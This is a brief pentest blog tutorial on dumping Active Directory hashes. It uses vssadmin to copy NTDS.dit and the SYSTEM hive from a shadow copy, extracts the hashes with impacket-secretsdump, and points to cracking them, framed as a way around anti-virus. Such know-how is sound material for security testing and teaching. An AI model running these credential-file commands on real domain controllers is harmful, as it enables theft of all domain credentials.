Extracting Domain Hashes: VSSAdmin
Published: 12 July 2020
We covered extracting domain hashes with Mimikatz previously, but that's not always the best approach - for example where anti-virus is getting in the way. However there are other options for the same goal. This time around we'll take a look at using Vssadmin, a built-in Windows tool.
VSSAdmin is the Volume Shadow Copy Administrative command-line tool and it can be used to take a copy of the NTDS.dit file - the file that contains the active directory domain hashes.
From a domain controller, either directly or with a tool like PsExec, a shadow copy can be created with this command:
vssadmin create shadow /for=C:
The required files can then be copied from the shadow copy, like this:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
Extracting the hashes locally from the NTDS.dit can be achieved with impacket-secretsdump. Using a command like this:
impacket-secretsdump -ntds ntds.dit -system SYSTEM local
(Please excuse the pixelation, I didn't have a convenient lab domain to hand so I dumped the Akimbo domain...don't tell the boss.)
When secretsdump is finished, you'll have a pwdump file which you can crack with a tool like John the Ripper or Hashcat - so maybe check out our article on how get got 420 GH/s with Hashcat and AWS.
Posts broken down by category
Articles concentrating on network and operating system level attacks.
Articles covering attacks against web applications and their associated APIS.
Articles concentrating on past data breaches, looking for lessons learned.
Articles covering breaking into wireless networks and how to keep them safe.